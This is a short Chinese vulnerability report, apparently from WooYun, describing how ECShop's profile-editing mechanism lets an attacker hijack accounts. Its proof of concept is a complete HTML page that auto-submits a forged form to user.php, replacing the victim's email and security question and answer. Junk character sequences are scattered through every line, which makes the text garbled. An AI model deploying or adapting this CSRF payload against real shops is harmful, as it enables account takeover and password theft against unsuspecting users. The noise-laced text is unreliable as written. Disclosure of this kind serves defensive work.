简要描述:7 t4 X2 n/ I$ q% _% o2 g' E6 H9 l
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现# V; Q2 D2 R3 v, ^* h
' Y+ ?8 i' u" P) r f: lDemo For:http://www.wooyun.org/bug.php?action=view&id=395
4 p \% {$ `# |8 l9 h' r7 q8 a8 M
: Z; G# P3 k( j/ U详细说明:* L2 G2 y$ S4 P7 |7 \. Y( V& w
利用csrf和xss可以突破官方所说的“障碍”
% e6 h" }& _% _' [xss版本已经有人说明
& Q7 F/ S" n- ^6 Y& L这里给出csrf版本
- g. B. G2 P% ?! Z4 F
+ n) w# E% L# b# R* Y) ]* u+ d漏洞证明:) _/ T* V6 D2 q$ p
<html>/ i$ b4 e8 o" V, B1 S" o
<body>! H" C* I- k9 C* V5 [
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">' X1 t \4 x3 Z+ B( M8 n- k8 R
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
7 t8 {7 @4 z# [* j1 N<INPUT TYPE="text" NAME="act" value="act_edit_profile">
6 @! n$ d7 W) p0 O- ^) N9 `<INPUT TYPE="text" NAME="sel_question" value="ecshop">" S. y: t$ W; a# y
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">8 p* e; M! ?! Z8 s" N+ i0 @. q
</body>
2 k" y' s) t* @& |4 ^<script>
+ Q+ i, W c1 y4 z% Bdocument.forms[0].submit();# E9 \, r, a* m3 u. b4 Z
</script>
* c8 g& I" h% o7 v</html>9 s% S) T% S- ~' _) U) G2 t# V2 Q
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失! {9 b7 X' V2 \: J. B& S
* `6 l$ x6 a" F" U2 o) d7 h! d5 ] |